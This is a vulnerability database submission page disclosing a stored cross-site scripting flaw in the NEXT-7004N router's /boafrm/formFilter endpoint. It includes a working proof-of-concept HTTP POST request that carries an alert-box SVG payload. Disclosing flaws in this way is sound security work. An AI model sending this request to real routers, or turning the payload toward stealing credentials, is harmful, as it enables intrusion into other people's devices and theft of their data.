Submit #148202: NEXT-7004N 3.0.1 - Cross-site Scripting Storedinfo

TitleNEXT-7004N 3.0.1 - Cross-site Scripting Stored
Description# Exploit Title: NEXT-7004N 3.0.1 - Cross-site Scripting Stored # Date: 2023-04-24 # Exploit Author: MrEmpy # Product Vendor: http://www.ez-net.co.kr/ # Version: 3.0.1 Title: ================ NEXT-7004N 3.0.1 - Cross-site Scripting Stored Summary: ================ The stored XSS vulnerability in the NEXT-7004N router in firmware version 3.0.1 occurs in the "/boafrm/formFilter" endpoint when the "url" parameter is passed via POST. This security flaw allows an attacker to inject malicious code into a web page that will be stored on the server and displayed to other users later, triggering a successful attack. The payload used to exploit this vulnerability is "<svg onload=alert(1337)>", which is capable of running an alert on the compromised page. This type of attack can be used to steal sensitive information, such as passwords and credit card information, or redirect users to malicious websites. Affected Product: ================ NEXT-7004N 3.0.1 Proof of Concept: ================ POST /boafrm/formFilter HTTP/1.1 Host: IP:8080 Content-Length: 171 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://IP:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close enabled=ON&urlFilterBlack=blackList&url=%3Csvg+onload%3Dalert%281337%29%3E&urlFilterMode=0&addFilterUrl=%EC%A0%80%EC%9E%A5&selectNum=&submit-url=%2Furlfilter.htm&encrypt=0
Source⚠️ .
User
 mrempy (UID 24379)
Submission04/25/2023 00:22 (3 years ago)
Moderation05/04/2023 18:02 (10 days later)
StatusAccepted
VulDB entry228012 [NEXTU NEXT-7004N 3.0.1 POST Request /boafrm/formFilter url cross site scripting]
Points17

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!